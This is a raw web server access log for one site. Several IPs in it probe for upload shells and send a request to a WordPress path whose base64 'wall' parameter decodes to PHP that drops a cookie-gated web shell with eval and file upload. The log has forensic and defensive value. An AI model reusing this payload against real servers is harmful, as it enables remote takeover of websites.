192.121.16.196 - - [01/Dec/2025:17:35:18 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2727.8 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /19055 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /19055/ HTTP/1.1" 200 1615 "http://www.galavista.com/19055" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /29b99 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /29b99/ HTTP/1.1" 200 1026 "http://www.galavista.com/29b99" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /ce685 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /7709b HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /7709b/ HTTP/1.1" 200 958 "http://www.galavista.com/7709b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /d4fae HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /d4fae/ HTTP/1.1" 200 1524 "http://www.galavista.com/d4fae" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /_autoindex/assets/css/autoindex.css HTTP/1.1" 200 1170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /35b2e HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:17:16:45 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2816.81 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:25:59 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
192.121.16.196 - - [01/Dec/2025:17:26:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
192.121.16.196 - - [01/Dec/2025:17:26:20 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
192.121.16.196 - - [01/Dec/2025:17:35:17 +0000] "GET / HTTP/1.1" 200 1494 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2727.8 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:35:17 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2727.8 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:35:17 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2727.8 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:17:35:18 +0000] "GET /_autoindex/assets/icons/file.svg HTTP/1.1" 200 354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:18 +0000] "GET /_autoindex/assets/icons/folder-fill.svg HTTP/1.1" 200 333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /_autoindex/assets/icons/file-text.svg HTTP/1.1" 200 394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /assets HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /straf HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /straf/ HTTP/1.1" 200 535 "http://www.galavista.com/straf" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /assets/ HTTP/1.1" 200 603 "http://www.galavista.com/assets" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:17:43:56 +0000] "GET / HTTP/1.1" 200 1492 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.21 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:44:01 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.21 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /a3d14 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /dfb27f996d.php HTTP/1.1" 200 1315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:19 +0000] "GET /ce685/ HTTP/1.1" 200 3856 "http://www.galavista.com/ce685" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /a3d14/ HTTP/1.1" 200 3855 "http://www.galavista.com/a3d14" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /error_log HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /c25fe HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /c25fe/ HTTP/1.1" 200 536 "http://www.galavista.com/c25fe" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /35b2e/ HTTP/1.1" 200 9032 "http://www.galavista.com/35b2e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:17:44:25 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.21 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:44:25 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.21 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:52:11 +0000] "GET / HTTP/1.1" 200 1497 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2862.89 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:52:11 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2862.89 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:52:21 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2862.89 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:26:21 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
216.73.216.189 - - [01/Dec/2025:17:33:47 +0000] "GET /doc.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:17:35:18 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2727.8 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /1d2be HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /1d2be/ HTTP/1.1" 200 613 "http://www.galavista.com/1d2be" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /a839d HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:17:35:20 +0000] "GET /a839d/ HTTP/1.1" 200 9107 "http://www.galavista.com/a839d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:17:44:25 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.21 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:52:20 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2862.89 Safari/537.36"
49.51.183.15 - - [01/Dec/2025:17:56:40 +0000] "GET /straf/?ND HTTP/1.1" 200 669 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.145.118.189 - - [01/Dec/2025:17:59:10 +0000] "GET /robots.txt HTTP/1.0" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36/Nutch-1.21-SNAPSHOT"
194.68.32.135 - - [01/Dec/2025:18:01:17 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:18:01:17 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
192.121.16.196 - - [01/Dec/2025:17:44:24 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2898.21 Safari/537.36"
43.135.145.73 - - [01/Dec/2025:17:44:54 +0000] "GET /assets/images/ HTTP/1.1" 200 872 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [01/Dec/2025:18:01:37 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:18:01:38 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
178.42.47.26 - - [01/Dec/2025:18:09:42 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3809.100 Safari/537.36"
178.42.47.26 - - [01/Dec/2025:18:09:42 +0000] "GET /_autoindex/assets/js/tablesort.js HTTP/1.1" 200 2300 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3809.100 Safari/537.36"
178.42.47.26 - - [01/Dec/2025:18:09:42 +0000] "GET /_autoindex/assets/js/tablesort.number.js HTTP/1.1" 200 366 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3809.100 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:18:11:16 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:18:11:18 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:18:11:19 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:18:11:20 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
216.73.216.189 - - [01/Dec/2025:18:20:34 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fpublic_html%2F19055%2Findex.php HTTP/1.1" 200 19766 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:18:01:39 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:18:01:39 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
170.106.113.235 - - [01/Dec/2025:18:02:19 +0000] "GET /7709b/ HTTP/1.1" 200 1100 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.186.131.59 - - [01/Dec/2025:18:11:18 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
129.226.93.214 - - [01/Dec/2025:18:14:09 +0000] "GET /1d2be/?SA HTTP/1.1" 200 752 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:18:19:33 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 1315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
